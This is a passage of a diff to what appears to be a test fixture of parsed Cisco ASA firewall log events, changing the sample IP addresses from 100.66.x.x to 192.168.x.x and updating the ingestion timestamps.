@@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-07-19T09:06:25.094783210Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:32:20.603847300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094784960Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:32:20.603851800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, 
@@ -1745,8 +1745,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094786730Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603857600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -1762,7 +1762,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.80.32",
+ "mapped_source_ip": "192.168.80.32",
 "connection_id": "11758",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -1784,8 +1784,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.80.32",
- "ip": "100.66.80.32"
+ "address": "192.168.80.32",
+ "ip": "192.168.80.32"
 },
 "tags": [
 "preserve_original_event"
@@ -1820,7 +1820,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.80.32",
+ "192.168.80.32",
 "172.31.98.44"
 ]
 },
@@ -1830,8 +1830,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094788478Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148",
+ "ingested": "2021-12-09T13:32:20.603862600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -1868,8 +1868,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.252.6",
- "ip": "100.66.252.6"
+ "address": "192.168.252.6",
+ "ip": "192.168.252.6"
 },
 "tags": [
 "preserve_original_event"
@@ -1904,7 +1904,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.252.6",
+ "192.168.252.6",
 "172.31.98.44"
 ]
 },
@@ -1913,8 +1913,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094790183Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603868400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -1930,7 +1930,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.252.6",
+ "mapped_source_ip": "192.168.252.6",
 "connection_id": "11759",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -1952,8 +1952,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.252.6",
- "ip": "100.66.252.6"
+ "address": "192.168.252.6",
+ "ip": "192.168.252.6"
 },
 "tags": [
 "preserve_original_event"
@@ -1988,7 +1988,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.252.6",
+ "192.168.252.6",
 "172.31.98.44"
 ]
 },
@@ -1998,8 +1998,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094792093Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164",
+ "ingested": "2021-12-09T13:32:20.603874500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -2031,8 +2031,8 @@
 },
 "destination": {
 "port": 8257,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1773,
@@ -2072,7 +2072,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -2080,8 +2080,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094793878Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257",
+ "ingested": "2021-12-09T13:32:20.603880300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -2114,8 +2114,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.252.226",
- "ip": "100.66.252.226"
+ "address": "192.168.252.226",
+ "ip": "192.168.252.226"
 },
 "tags": [
 "preserve_original_event"
@@ -2150,7 +2150,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.252.226",
+ "192.168.252.226",
 "172.31.98.44"
 ]
 },
@@ -2159,8 +2159,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094795609Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)",
+ "ingested": "2021-12-09T13:32:20.603886100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -2176,7 +2176,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.252.226",
+ "mapped_source_ip": "192.168.252.226",
 "connection_id": "11760",
 "source_interface": "outside",
 "mapped_destination_port": 1773
@@ -2193,8 +2193,8 @@
 },
 "destination": {
 "port": 8258,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1774,
@@ -2234,7 +2234,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -2242,8 +2242,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094797364Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258",
+ "ingested": "2021-12-09T13:32:20.603891900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -2276,8 +2276,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.252.226",
- "ip": "100.66.252.226"
+ "address": "192.168.252.226",
+ "ip": "192.168.252.226"
 },
 "tags": [
 "preserve_original_event"
@@ -2312,7 +2312,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.252.226",
+ "192.168.252.226",
 "172.31.98.44"
 ]
 },
@@ -2321,8 +2321,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094799118Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)",
+ "ingested": "2021-12-09T13:32:20.603897800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -2338,7 +2338,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.252.226",
+ "mapped_source_ip": "192.168.252.226",
 "connection_id": "11761",
 "source_interface": "outside",
 "mapped_destination_port": 1774
@@ -2360,8 +2360,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.238.126",
- "ip": "100.66.238.126"
+ "address": "192.168.238.126",
+ "ip": "192.168.238.126"
 },
 "tags": [
 "preserve_original_event"
@@ -2396,7 +2396,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.238.126",
+ "192.168.238.126",
 "172.31.98.44"
 ]
 },
@@ -2405,8 +2405,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094800868Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603903600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -2422,7 +2422,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.238.126",
+ "mapped_source_ip": "192.168.238.126",
 "connection_id": "11762",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -2444,8 +2444,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.93.51",
- "ip": "100.66.93.51"
+ "address": "192.168.93.51",
+ "ip": "192.168.93.51"
 },
 "tags": [
 "preserve_original_event"
@@ -2480,7 +2480,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.93.51",
+ "192.168.93.51",
 "172.31.98.44"
 ]
 },
@@ -2489,8 +2489,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094802588Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603909400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -2506,7 +2506,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.93.51",
+ "mapped_source_ip": "192.168.93.51",
 "connection_id": "11763",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -2528,8 +2528,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.238.126",
- "ip": "100.66.238.126"
+ "address": "192.168.238.126",
+ "ip": "192.168.238.126"
 },
 "tags": [
 "preserve_original_event"
@@ -2564,7 +2564,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.238.126",
+ "192.168.238.126",
 "172.31.98.44"
 ]
 },
@@ -2574,8 +2574,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094804338Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111",
+ "ingested": "2021-12-09T13:32:20.603915200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -2612,8 +2612,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.93.51",
- "ip": "100.66.93.51"
+ "address": "192.168.93.51",
+ "ip": "192.168.93.51"
 },
 "tags": [
 "preserve_original_event"
@@ -2648,7 +2648,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.93.51",
+ "192.168.93.51",
 "172.31.98.44"
 ]
 },
@@ -2658,8 +2658,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094806119Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237",
+ "ingested": "2021-12-09T13:32:20.603921Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -2691,8 +2691,8 @@
 },
 "destination": {
 "port": 8259,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1775,
@@ -2732,7 +2732,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -2740,8 +2740,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094807851Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259",
+ "ingested": "2021-12-09T13:32:20.603926900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -2774,8 +2774,8 @@
 },
 "source": {
 "port": 443,
- "address": "100.66.225.103",
- "ip": "100.66.225.103"
+ "address": "192.168.225.103",
+ "ip": "192.168.225.103"
 },
 "tags": [
 "preserve_original_event"
@@ -2810,7 +2810,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.225.103",
+ "192.168.225.103",
 "172.31.98.44"
 ]
 },
@@ -2819,8 +2819,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094809645Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)",
+ "ingested": "2021-12-09T13:32:20.603932700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -2836,7 +2836,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 443,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.225.103",
+ "mapped_source_ip": "192.168.225.103",
 "connection_id": "11764",
 "source_interface": "outside",
 "mapped_destination_port": 1775
@@ -2853,8 +2853,8 @@
 },
 "destination": {
 "port": 1189,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 56132,
@@ -2894,7 +2894,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -2902,8 +2902,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094811539Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189",
+ "ingested": "2021-12-09T13:32:20.603941800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -2936,8 +2936,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.240.126",
- "ip": "100.66.240.126"
+ "address": "192.168.240.126",
+ "ip": "192.168.240.126"
 },
 "tags": [
 "preserve_original_event"
@@ -2972,7 +2972,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.240.126",
+ "192.168.240.126",
 "172.31.98.44"
 ]
 },
@@ -2981,8 +2981,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094815755Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603946100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -2998,7 +2998,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.240.126",
+ "mapped_source_ip": "192.168.240.126",
 "connection_id": "11772",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -3020,8 +3020,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.44.45",
- "ip": "100.66.44.45"
+ "address": "192.168.44.45",
+ "ip": "192.168.44.45"
 },
 "tags": [
 "preserve_original_event"
@@ -3056,7 +3056,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.44.45",
+ "192.168.44.45",
 "172.31.98.44"
 ]
 },
@@ -3065,8 +3065,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094817625Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603953400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -3082,7 +3082,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.44.45",
+ "mapped_source_ip": "192.168.44.45",
 "connection_id": "11773",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -3104,8 +3104,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.240.126",
- "ip": "100.66.240.126"
+ "address": "192.168.240.126",
+ "ip": "192.168.240.126"
 },
 "tags": [
 "preserve_original_event"
@@ -3140,7 +3140,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.240.126",
+ "192.168.240.126",
 "172.31.98.44"
 ]
 },
@@ -3150,8 +3150,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094819363Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87",
+ "ingested": "2021-12-09T13:32:20.603958Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -3188,8 +3188,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.44.45",
- "ip": "100.66.44.45"
+ "address": "192.168.44.45",
+ "ip": "192.168.44.45"
 },
 "tags": [
 "preserve_original_event"
@@ -3224,7 +3224,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.44.45",
+ "192.168.44.45",
 "172.31.98.44"
 ]
 },
@@ -3234,8 +3234,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094821104Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221",
+ "ingested": "2021-12-09T13:32:20.603963900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -3267,8 +3267,8 @@
 },
 "destination": {
 "port": 8265,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1452,
@@ -3308,7 +3308,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -3316,8 +3316,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094822926Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265",
+ "ingested": "2021-12-09T13:32:20.603967700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -3350,8 +3350,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.179.219",
- "ip": "100.66.179.219"
+ "address": "192.168.179.219",
+ "ip": "192.168.179.219"
 },
 "tags": [
 "preserve_original_event"
@@ -3386,7 +3386,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.179.219",
+ "192.168.179.219",
 "172.31.98.44"
 ]
 },
@@ -3395,8 +3395,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094824626Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)",
+ "ingested": "2021-12-09T13:32:20.603972300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -3412,7 +3412,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.179.219",
+ "mapped_source_ip": "192.168.179.219",
 "connection_id": "11774",
 "source_interface": "outside",
 "mapped_destination_port": 1452
@@ -3434,8 +3434,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.157.232",
- "ip": "100.66.157.232"
+ "address": "192.168.157.232",
+ "ip": "192.168.157.232"
 },
 "tags": [
 "preserve_original_event"
@@ -3470,7 +3470,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.157.232",
+ "192.168.157.232",
 "172.31.98.44"
 ]
 },
@@ -3479,8 +3479,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094826343Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603978200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -3496,7 +3496,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.157.232",
+ "mapped_source_ip": "192.168.157.232",
 "connection_id": "11775",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -3518,8 +3518,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.178.133",
- "ip": "100.66.178.133"
+ "address": "192.168.178.133",
+ "ip": "192.168.178.133"
 },
 "tags": [
 "preserve_original_event"
@@ -3554,7 +3554,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.178.133",
+ "192.168.178.133",
 "172.31.98.44"
 ]
 },
@@ -3563,8 +3563,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.094828177Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.603983700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -3580,7 +3580,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.178.133",
+ "mapped_source_ip": "192.168.178.133",
 "connection_id": "11776",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -3602,8 +3602,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.157.232",
- "ip": "100.66.157.232"
+ "address": "192.168.157.232",
+ "ip": "192.168.157.232"
 },
 "tags": [
 "preserve_original_event"
@@ -3638,7 +3638,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.157.232",
+ "192.168.157.232",
 "172.31.98.44"
 ]
 },
@@ -3648,8 +3648,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.094829936Z",
